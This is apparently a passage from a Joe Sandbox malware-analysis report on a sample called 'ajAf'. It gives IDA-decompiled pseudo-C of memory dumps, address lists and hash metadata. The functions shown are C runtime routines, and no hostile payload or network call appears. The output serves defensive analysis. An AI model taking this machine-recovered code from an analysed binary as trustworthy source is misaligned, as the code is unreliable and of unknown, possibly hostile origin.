                                                          										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                          										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                          										__eflags = _t69;
                                                          										_push(_t104 + 0x18);
                                                          										if(__eflags >= 0) {
                                                          											_push(_t69);
                                                          											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                          										} else {
                                                          											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                          											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                          											_t70 = E0040CB9D();
                                                          										}
                                                          										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                          										__eflags = _t70;
                                                          										if(_t70 == 0) {
                                                          											goto L30;
                                                          										} else {
                                                          											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                          											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                          												E00405000(_t93, 0);
                                                          												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                          												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                          												__eflags = _t74;
                                                          												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                          												return _t93;
                                                          											} else {
                                                          												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                          												return _t93;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L42;
                                                          							L7:
                                                          							_t62 =  *_t83;
                                                          							 *_t88 = _t62;
                                                          							_t83 = _t83 + 1;
                                                          							_t88 = _t88 + 1;
                                                          							if(_t62 != 0) {
                                                          								goto L7;
                                                          							} else {
                                                          								 *((char*)(_t93 + 0x5c)) = 0;
                                                          							}
                                                          							goto L9;
                                                          						}
                                                          					}
                                                          				}
                                                          				L42:
                                                          			}

































                                                          0x004057b7
                                                          0x004057bf
                                                          0x004057c3
                                                          0x004057c5
                                                          0x004057cd
                                                          0x004059c8
                                                          0x004059ce
                                                          0x004057db
                                                          0x004057e3
                                                          0x004057e5
                                                          0x004057ea
                                                          0x00405921
                                                          0x0040592a
                                                          0x004057f0
                                                          0x004057f3
                                                          0x004057f6
                                                          0x004057f9
                                                          0x004057fc
                                                          0x004057ff
                                                          0x00405801
                                                          0x00405804
                                                          0x00405807
                                                          0x0040580a
                                                          0x0040580d
                                                          0x00405810
                                                          0x00405813
                                                          0x00405816
                                                          0x00405819
                                                          0x0040581c
                                                          0x00405824
                                                          0x00405827
                                                          0x0040582b
                                                          0x0040582e
                                                          0x00405831
                                                          0x00405834
                                                          0x00405837
                                                          0x00405837
                                                          0x00405839
                                                          0x0040583a
                                                          0x00405842
                                                          0x00405847
                                                          0x0040584a
                                                          0x0040584f
                                                          0x0040591c
                                                          0x0040591c
                                                          0x00000000
                                                          0x00405855
                                                          0x00405855
                                                          0x00405859
                                                          0x0040585b
                                                          0x00000000
                                                          0x00405870
                                                          0x00405872
                                                          0x00405874
                                                          0x00405874
                                                          0x00405877
                                                          0x0040587b
                                                          0x00405881
                                                          0x00405881
                                                          0x00405885
                                                          0x00405889
                                                          0x00405897
                                                          0x00405899
                                                          0x004058a5
                                                          0x004058a7
                                                          0x004058b3
                                                          0x004058b5
                                                          0x004058c1
                                                          0x004058c5
                                                          0x004058c7
                                                          0x004058c7
                                                          0x004058c8
                                                          0x004058b7
                                                          0x004058b7
                                                          0x004058b7
                                                          0x004058a9
                                                          0x004058a9
                                                          0x004058a9
                                                          0x0040589b
                                                          0x0040589b
                                                          0x0040589b
                                                          0x0040588f
                                                          0x00405892
                                                          0x00405892
                                                          0x004058cc
                                                          0x004058cf
                                                          0x00000000
                                                          0x00000000
                                                          0x004058d1
                                                          0x004058d9
                                                          0x00000000
                                                          0x00000000
                                                          0x004058db
                                                          0x004058db
                                                          0x004058e0
                                                          0x00000000
                                                          0x004058e2
                                                          0x004058e4
                                                          0x00405930
                                                          0x0040593f
                                                          0x00405942
                                                          0x00405944
                                                          0x00405949
                                                          0x0040594c
                                                          0x0040594e
                                                          0x00000000
                                                          0x00405950
                                                          0x00405950
                                                          0x00405953
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405953
                                                          0x004058e6
                                                          0x004058ea
                                                          0x004058ec
                                                          0x004058f1
                                                          0x004058f2
                                                          0x004058f4
                                                          0x004058f6
                                                          0x004058f8
                                                          0x004058f9
                                                          0x00405904
                                                          0x00405906
                                                          0x0040590b
                                                          0x0040590e
                                                          0x00405911
                                                          0x00405916
                                                          0x00000000
                                                          0x00405955
                                                          0x00405955
                                                          0x00405955
                                                          0x00405961
                                                          0x00405963
                                                          0x00405967
                                                          0x0040596d
                                                          0x0040596e
                                                          0x0040597c
                                                          0x0040597d
                                                          0x00405970
                                                          0x00405970
                                                          0x00405974
                                                          0x00405975
                                                          0x00405975
                                                          0x00405985
                                                          0x00405988
                                                          0x0040598a
                                                          0x00000000
                                                          0x0040598c
                                                          0x0040598c
                                                          0x00405990
                                                          0x004059a5
                                                          0x004059ad
                                                          0x004059b6
                                                          0x004059b6
                                                          0x004059b9
                                                          0x004059c5
                                                          0x00405992
                                                          0x00405992
                                                          0x004059a2
                                                          0x004059a2
                                                          0x00405990
                                                          0x0040598a
                                                          0x00405916
                                                          0x004058e4
                                                          0x00000000
                                                          0x00405860
                                                          0x00405860
                                                          0x00405862
                                                          0x00405864
                                                          0x00405865
                                                          0x00405868
                                                          0x00000000
                                                          0x0040586a
                                                          0x0040586a
                                                          0x0040586d
                                                          0x00000000
                                                          0x00405868
                                                          0x0040584f
                                                          0x004057ea
                                                          0x00000000

                                                          APIs
                                                          • _malloc.LIBCMT ref: 004057DE
                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                          • _malloc.LIBCMT ref: 00405842
                                                          • _malloc.LIBCMT ref: 00405906
                                                          • _malloc.LIBCMT ref: 00405930
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _malloc$AllocateHeap
                                                          • String ID: 1.2.3
                                                          • API String ID: 680241177-2310465506
                                                          • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                          • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                          • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                          • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _malloc.LIBCMT ref: 01FC5A45
                                                            • Part of subcall function 01FCBAB4: __FF_MSGBANNER.LIBCMT ref: 01FCBAD7
                                                            • Part of subcall function 01FCBAB4: __NMSG_WRITE.LIBCMT ref: 01FCBADE
                                                          • _malloc.LIBCMT ref: 01FC5AA9
                                                          • _malloc.LIBCMT ref: 01FC5B6D
                                                          • _malloc.LIBCMT ref: 01FC5B97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _malloc
                                                          • String ID: 1.2.3
                                                          • API String ID: 1579825452-2310465506
                                                          • Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                          • Instruction ID: 32e575a328db9275ec5a5314561b78cfd8513301fdd84e6a43d16793c6225fc2
                                                          • Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                          • Instruction Fuzzy Hash: 5E61D1B1E447828FD7209F2D8980666FFE0FB55B10F58492ED1C987610D776B04AEF52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                          				signed int _v8;
                                                          				char* _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t90;
                                                          				intOrPtr* _t92;
                                                          				signed int _t94;
                                                          				char _t97;
                                                          				signed int _t105;
                                                          				void* _t106;
                                                          				signed int _t107;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				intOrPtr* _t114;
                                                          				signed int _t118;
                                                          				signed int _t119;
                                                          				signed int _t120;
                                                          				char* _t121;
                                                          				signed int _t125;
                                                          				signed int _t131;
                                                          				signed int _t133;
                                                          				void* _t134;
                                                          
                                                          				_t125 = __edx;
                                                          				_t121 = _a4;
                                                          				_t119 = _a8;
                                                          				_t131 = 0;
                                                          				_v12 = _t121;
                                                          				_v8 = _t119;
                                                          				if(_a12 == 0 || _a16 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				} else {
                                                          					_t138 = _t121;
                                                          					if(_t121 != 0) {
                                                          						_t133 = _a20;
                                                          						__eflags = _t133;
                                                          						if(_t133 == 0) {
                                                          							L9:
                                                          							__eflags = _t119 - 0xffffffff;
                                                          							if(_t119 != 0xffffffff) {
                                                          								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                          								_t134 = _t134 + 0xc;
                                                          							}
                                                          							__eflags = _t133 - _t131;
                                                          							if(__eflags == 0) {
                                                          								goto L3;
                                                          							} else {
                                                          								_t94 = _t90 | 0xffffffff;
                                                          								_t125 = _t94 % _a12;
                                                          								__eflags = _a16 - _t94 / _a12;
                                                          								if(__eflags > 0) {
                                                          									goto L3;
                                                          								}
                                                          								L13:
                                                          								_t131 = _a12 * _a16;
                                                          								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                          								_v20 = _t131;
                                                          								_t120 = _t131;
                                                          								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                          									_v16 = 0x1000;
                                                          								} else {
                                                          									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                          								}
                                                          								__eflags = _t131;
                                                          								if(_t131 == 0) {
                                                          									L40:
                                                          									return _a16;
                                                          								} else {
                                                          									do {
                                                          										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                          										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                          											L24:
                                                          											__eflags = _t120 - _v16;
                                                          											if(_t120 < _v16) {
                                                          												_t97 = E0040FC07(_t120, _t125, _t133);
                                                          												__eflags = _t97 - 0xffffffff;
                                                          												if(_t97 == 0xffffffff) {
                                                          													L48:
                                                          													return (_t131 - _t120) / _a12;
                                                          												}
                                                          												__eflags = _v8;
                                                          												if(_v8 == 0) {
                                                          													L44:
                                                          													__eflags = _a8 - 0xffffffff;
                                                          													if(__eflags != 0) {
                                                          														E0040BA30(_t131, _a4, 0, _a8);
                                                          														_t134 = _t134 + 0xc;
                                                          													}
                                                          													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                          													_push(0);
                                                          													_push(0);
                                                          													_push(0);
                                                          													_push(0);
                                                          													_push(0);
                                                          													L4:
                                                          													E0040E744(_t125, _t131, _t133);
                                                          													goto L5;
                                                          												}
                                                          												_t123 = _v12;
                                                          												_v12 = _v12 + 1;
                                                          												 *_v12 = _t97;
                                                          												_t120 = _t120 - 1;
                                                          												_t70 =  &_v8;
                                                          												 *_t70 = _v8 - 1;
                                                          												__eflags =  *_t70;
                                                          												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                          												goto L39;
                                                          											}
                                                          											__eflags = _v16;
                                                          											if(_v16 == 0) {
                                                          												_t105 = 0x7fffffff;
                                                          												__eflags = _t120 - 0x7fffffff;
                                                          												if(_t120 <= 0x7fffffff) {
                                                          													_t105 = _t120;
                                                          												}
                                                          											} else {
                                                          												__eflags = _t120 - 0x7fffffff;
                                                          												if(_t120 <= 0x7fffffff) {
                                                          													_t55 = _t120 % _v16;
                                                          													__eflags = _t55;
                                                          													_t125 = _t55;
                                                          													_t110 = _t120;
                                                          												} else {
                                                          													_t125 = 0x7fffffff % _v16;
                                                          													_t110 = 0x7fffffff;
                                                          												}
                                                          												_t105 = _t110 - _t125;
                                                          											}
                                                          											__eflags = _t105 - _v8;
                                                          											if(_t105 > _v8) {
                                                          												goto L44;
                                                          											} else {
                                                          												_push(_t105);
                                                          												_push(_v12);
                                                          												_t106 = E0040FA20(_t125, _t131, _t133);
                                                          												_pop(_t123);
                                                          												_push(_t106);
                                                          												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                          												_t134 = _t134 + 0xc;
                                                          												__eflags = _t107;
                                                          												if(_t107 == 0) {
                                                          													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                          													goto L48;
                                                          												}
                                                          												__eflags = _t107 - 0xffffffff;
                                                          												if(_t107 == 0xffffffff) {
                                                          													L47:
                                                          													_t80 = _t133 + 0xc;
                                                          													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                          													__eflags =  *_t80;
                                                          													goto L48;
                                                          												}
                                                          												_v12 = _v12 + _t107;
                                                          												_t120 = _t120 - _t107;
                                                          												_v8 = _v8 - _t107;
                                                          												goto L39;
                                                          											}
                                                          										}
                                                          										_t113 =  *(_t133 + 4);
                                                          										__eflags = _t113;
                                                          										if(__eflags == 0) {
                                                          											goto L24;
                                                          										}
                                                          										if(__eflags < 0) {
                                                          											goto L47;
                                                          										}
                                                          										_t131 = _t120;
                                                          										__eflags = _t120 - _t113;
                                                          										if(_t120 >= _t113) {
                                                          											_t131 = _t113;
                                                          										}
                                                          										__eflags = _t131 - _v8;
                                                          										if(_t131 > _v8) {
                                                          											_t133 = 0;
                                                          											__eflags = _a8 - 0xffffffff;
                                                          											if(__eflags != 0) {
                                                          												E0040BA30(_t131, _a4, 0, _a8);
                                                          												_t134 = _t134 + 0xc;
                                                          											}
                                                          											_t114 = E0040BFC1(__eflags);
                                                          											_push(_t133);
                                                          											_push(_t133);
                                                          											_push(_t133);
                                                          											_push(_t133);
                                                          											 *_t114 = 0x22;
                                                          											_push(_t133);
                                                          											goto L4;
                                                          										} else {
                                                          											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                          											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                          											 *_t133 =  *_t133 + _t131;
                                                          											_v12 = _v12 + _t131;
                                                          											_t120 = _t120 - _t131;
                                                          											_t134 = _t134 + 0x10;
                                                          											_v8 = _v8 - _t131;
                                                          											_t131 = _v20;
                                                          										}
                                                          										L39:
                                                          										__eflags = _t120;
                                                          									} while (_t120 != 0);
                                                          									goto L40;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t118 = _t90 | 0xffffffff;
                                                          						_t90 = _t118 / _a12;
                                                          						_t125 = _t118 % _a12;
                                                          						__eflags = _a16 - _t90;
                                                          						if(_a16 <= _t90) {
                                                          							goto L13;
                                                          						}
                                                          						goto L9;
                                                          					}
                                                          					L3:
                                                          					_t92 = E0040BFC1(_t138);
                                                          					_push(_t131);
                                                          					_push(_t131);
                                                          					_push(_t131);
                                                          					_push(_t131);
                                                          					 *_t92 = 0x16;
                                                          					_push(_t131);
                                                          					goto L4;
                                                          				}
                                                          			}





























                                                          0x0040bcc2
                                                          0x0040bcca
                                                          0x0040bcce
                                                          0x0040bcd3
                                                          0x0040bcd5
                                                          0x0040bcd8
                                                          0x0040bcde
                                                          0x0040bd01
                                                          0x00000000
                                                          0x0040bce5
                                                          0x0040bce5
                                                          0x0040bce7
                                                          0x0040bd08
                                                          0x0040bd0b
                                                          0x0040bd0d
                                                          0x0040bd1c
                                                          0x0040bd1c
                                                          0x0040bd1f
                                                          0x0040bd24
                                                          0x0040bd29
                                                          0x0040bd29
                                                          0x0040bd2c
                                                          0x0040bd2e
                                                          0x00000000
                                                          0x0040bd30
                                                          0x0040bd30
                                                          0x0040bd35
                                                          0x0040bd38
                                                          0x0040bd3b
                                                          0x00000000
                                                          0x00000000
                                                          0x0040bd3d
                                                          0x0040bd40
                                                          0x0040bd44
                                                          0x0040bd4b
                                                          0x0040bd4e
                                                          0x0040bd50
                                                          0x0040bd5a
                                                          0x0040bd52
                                                          0x0040bd55
                                                          0x0040bd55
                                                          0x0040bd61
                                                          0x0040bd63
                                                          0x0040be53
                                                          0x00000000
                                                          0x0040bd69
                                                          0x0040bd69
                                                          0x0040bd69
                                                          0x0040bd70
                                                          0x0040bdb6
                                                          0x0040bdb6
                                                          0x0040bdb9
                                                          0x0040be24
                                                          0x0040be2a
                                                          0x0040be2d
                                                          0x0040beb8
                                                          0x00000000
                                                          0x0040bebe
                                                          0x0040be33
                                                          0x0040be37
                                                          0x0040be87
                                                          0x0040be87
                                                          0x0040be8b
                                                          0x0040be95
                                                          0x0040be9a
                                                          0x0040be9a
                                                          0x0040bea2
                                                          0x0040beaa
                                                          0x0040beab
                                                          0x0040beac
                                                          0x0040bead
                                                          0x0040beae
                                                          0x0040bcf9
                                                          0x0040bcf9
                                                          0x00000000
                                                          0x0040bcfe
                                                          0x0040be39
                                                          0x0040be3c
                                                          0x0040be3f
                                                          0x0040be44
                                                          0x0040be45
                                                          0x0040be45
                                                          0x0040be45
                                                          0x0040be48
                                                          0x00000000
                                                          0x0040be48
                                                          0x0040bdbb
                                                          0x0040bdbf
                                                          0x0040bde0
                                                          0x0040bde5
                                                          0x0040bde7
                                                          0x0040bde9
                                                          0x0040bde9
                                                          0x0040bdc1
                                                          0x0040bdc8
                                                          0x0040bdca
                                                          0x0040bdd7
                                                          0x0040bdd7
                                                          0x0040bdd7
                                                          0x0040bdda
                                                          0x0040bdcc
                                                          0x0040bdce
                                                          0x0040bdd1
                                                          0x0040bdd1
                                                          0x0040bddc
                                                          0x0040bddc
                                                          0x0040bdeb
                                                          0x0040bdee
                                                          0x00000000
                                                          0x0040bdf4
                                                          0x0040bdf4
                                                          0x0040bdf5
                                                          0x0040bdf9
                                                          0x0040bdfe
                                                          0x0040bdff
                                                          0x0040be00
                                                          0x0040be05
                                                          0x0040be08
                                                          0x0040be0a
                                                          0x0040bec6
                                                          0x00000000
                                                          0x0040bec6
                                                          0x0040be10
                                                          0x0040be13
                                                          0x0040beb4
                                                          0x0040beb4
                                                          0x0040beb4
                                                          0x0040beb4
                                                          0x00000000
                                                          0x0040beb4
                                                          0x0040be19
                                                          0x0040be1c
                                                          0x0040be1e
                                                          0x00000000
                                                          0x0040be1e
                                                          0x0040bdee
                                                          0x0040bd72
                                                          0x0040bd75
                                                          0x0040bd77
                                                          0x00000000
                                                          0x00000000
                                                          0x0040bd79
                                                          0x00000000
                                                          0x00000000
                                                          0x0040bd7f
                                                          0x0040bd81
                                                          0x0040bd83
                                                          0x0040bd85
                                                          0x0040bd85
                                                          0x0040bd87
                                                          0x0040bd8a
                                                          0x0040be5b
                                                          0x0040be5d
                                                          0x0040be61
                                                          0x0040be6a
                                                          0x0040be6f
                                                          0x0040be6f
                                                          0x0040be72
                                                          0x0040be77
                                                          0x0040be78
                                                          0x0040be79
                                                          0x0040be7a
                                                          0x0040be7b
                                                          0x0040be81
                                                          0x00000000
                                                          0x0040bd90
                                                          0x0040bd99
                                                          0x0040bd9e
                                                          0x0040bda1
                                                          0x0040bda3
                                                          0x0040bda6
                                                          0x0040bda8
                                                          0x0040bdab
                                                          0x0040bdae
                                                          0x0040bdae
                                                          0x0040be4b
                                                          0x0040be4b
                                                          0x0040be4b
                                                          0x00000000
                                                          0x0040bd69
                                                          0x0040bd63
                                                          0x0040bd2e
                                                          0x0040bd0f
                                                          0x0040bd14
                                                          0x0040bd14
                                                          0x0040bd17
                                                          0x0040bd1a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040bd1a
                                                          0x0040bce9
                                                          0x0040bce9
                                                          0x0040bcee
                                                          0x0040bcef
                                                          0x0040bcf0
                                                          0x0040bcf1
                                                          0x0040bcf2
                                                          0x0040bcf8
                                                          0x00000000
                                                          0x0040bcf8

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                          • String ID:
                                                          • API String ID: 3886058894-0
                                                          • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                          • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                          • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                          • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                          • String ID:
                                                          • API String ID: 3886058894-0
                                                          • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                          • Instruction ID: 470f303bc4884362e2cd49405cb72f0af0431b1bb1ea95c1f3a8645556a84fbf
                                                          • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                          • Instruction Fuzzy Hash: 54511571D0020BEBDB208FAD8E4559EBBB5EF91B60F14821DE82D92290D7738A51EF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __fileno$__getptd_noexit__lock_file
                                                          • String ID: 'B
                                                          • API String ID: 3755561058-2787509829
                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                          • Instruction ID: 449411163c578d925a2a08468c3e944840100b366d751407b85c31cd14c02e24
                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                          • Instruction Fuzzy Hash: C9018E33610A1356C321AB7C5F414AEFBA08EA6F70325430CD079DB5D1EB2AC602B255
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                          				signed int _t13;
                                                          				intOrPtr _t28;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          
                                                          				_t30 = __eflags;
                                                          				_t26 = __edi;
                                                          				_t25 = __edx;
                                                          				_t22 = __ebx;
                                                          				_push(0xc);
                                                          				_push(0x4214d0);
                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                          				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                          				_t13 =  *0x422e34; // 0xfffffffe
                                                          				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                          					L6:
                                                          					E0040D6E0(_t22, 0xc);
                                                          					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                          					_t8 = _t28 + 0x6c; // 0x6c
                                                          					_t26 =  *0x422f18; // 0x422e40
                                                          					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                          					 *(_t29 - 4) = 0xfffffffe;
                                                          					E004147A2();
                                                          				} else {
                                                          					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                          					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                          						goto L6;
                                                          					} else {
                                                          						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                          					}
                                                          				}
                                                          				if(_t28 == 0) {
                                                          					E0040E79A(_t25, _t26, 0x20);
                                                          				}
                                                          				return E0040E21D(_t28);
                                                          			}







                                                          0x00414738
                                                          0x00414738
                                                          0x00414738
                                                          0x00414738
                                                          0x00414738
                                                          0x0041473a
                                                          0x0041473f
                                                          0x00414749
                                                          0x0041474b
                                                          0x00414753
                                                          0x00414777
                                                          0x00414779
                                                          0x0041477f
                                                          0x00414783
                                                          0x00414786
                                                          0x00414791
                                                          0x00414794
                                                          0x0041479b
                                                          0x00414755
                                                          0x00414755
                                                          0x00414759
                                                          0x00000000
                                                          0x0041475b
                                                          0x00414760
                                                          0x00414760
                                                          0x00414759
                                                          0x00414765
                                                          0x00414769
                                                          0x0041476e
                                                          0x00414776

                                                          APIs
                                                          • __getptd.LIBCMT ref: 00414744
                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                          • __getptd.LIBCMT ref: 0041475B
                                                          • __amsg_exit.LIBCMT ref: 00414769
                                                          • __lock.LIBCMT ref: 00414779
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                          • String ID: @.B
                                                          • API String ID: 3521780317-470711618
                                                          • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                          • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                          • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                          • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __getptd.LIBCMT ref: 01FD49AB
                                                            • Part of subcall function 01FD099C: __getptd_noexit.LIBCMT ref: 01FD099F
                                                            • Part of subcall function 01FD099C: __amsg_exit.LIBCMT ref: 01FD09AC
                                                          • __getptd.LIBCMT ref: 01FD49C2
                                                          • __amsg_exit.LIBCMT ref: 01FD49D0
                                                          • __lock.LIBCMT ref: 01FD49E0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                          • String ID: @.B
                                                          • API String ID: 3521780317-470711618
                                                          • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                          • Instruction ID: 444adc871db387376cf3a173ba6198d987b7f512d36c60c2a0270ab28544c528
                                                          • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                          • Instruction Fuzzy Hash: D1F09032A40712DBEB20FB699E0576D77A16F10B20F49011AD446A7AD1CB76A801DB97
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___addlocaleref.LIBCMT ref: 01FD4973
                                                          • ___removelocaleref.LIBCMT ref: 01FD497E
                                                          • ___freetlocinfo.LIBCMT ref: 01FD4992
                                                            • Part of subcall function 01FD46F0: ___free_lconv_mon.LIBCMT ref: 01FD4736
                                                            • Part of subcall function 01FD46F0: ___free_lconv_num.LIBCMT ref: 01FD4757
